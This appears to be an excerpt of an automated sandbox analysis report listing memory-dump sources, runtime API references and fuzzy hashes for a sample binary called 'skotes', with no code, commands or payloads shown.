                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3433162309-0
                                                                                                                                                                                            • Opcode ID: a77b6377a004442bb97e4686a31753ae4c88c716f7486e3f417c928f46bde34f
                                                                                                                                                                                            • Instruction ID: 83a64e599fa0d8931b70539907d9cd9f7696f5bed9cce85b03c7f518d02b326e
                                                                                                                                                                                            • Opcode Fuzzy Hash: a77b6377a004442bb97e4686a31753ae4c88c716f7486e3f417c928f46bde34f
                                                                                                                                                                                            • Instruction Fuzzy Hash: D8314A75A0071AEFCF10DF94D490BAEBBBABF44300F1408AAD901AB346D770A945DFA0
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 006313FC
                                                                                                                                                                                            • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 00631447
                                                                                                                                                                                            • Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 0063147A
                                                                                                                                                                                            • Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 0063152A
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2092016602-0
                                                                                                                                                                                            • Opcode ID: e4ca038835f896d7414ea95cd62b46c6e8f0c40c3f6e2169a8a9a0d35c0f6fb6
                                                                                                                                                                                            • Instruction ID: ae6094fb69227ab9267fe5fe34a99cedbba957c26f487052f50856ed4d956b6e
                                                                                                                                                                                            • Opcode Fuzzy Hash: e4ca038835f896d7414ea95cd62b46c6e8f0c40c3f6e2169a8a9a0d35c0f6fb6
                                                                                                                                                                                            • Instruction Fuzzy Hash: CB316171A00A169BCB54DFA8D4915EDF7F6BF88710F14822DE416AB391CB349A41CBD4
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 531285432-0
                                                                                                                                                                                            • Opcode ID: 775b4530a0c83636a50d46ea2860724d4f4ba69d1b535edaad1377a3ba89ea73
                                                                                                                                                                                            • Instruction ID: ccbbca7c78ab97efd50f4524d85e100dac163a3ca18e9bb6e7c3463646cb7574
                                                                                                                                                                                            • Opcode Fuzzy Hash: 775b4530a0c83636a50d46ea2860724d4f4ba69d1b535edaad1377a3ba89ea73
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A213271A00219AFDF00EFA4DC859FEB7BAEF08724F145059F501B7251DB349D819BA5
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 00629C9C
                                                                                                                                                                                            • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00629CE8
                                                                                                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 00629CFE
                                                                                                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 00629D6A
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
